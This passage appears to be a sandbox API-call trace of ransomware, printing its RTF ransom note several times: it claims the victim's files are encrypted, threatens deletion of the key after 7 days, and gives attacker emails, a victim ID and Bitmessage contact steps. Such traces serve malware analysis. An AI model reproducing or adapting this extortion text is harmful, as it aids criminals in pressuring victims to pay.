that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 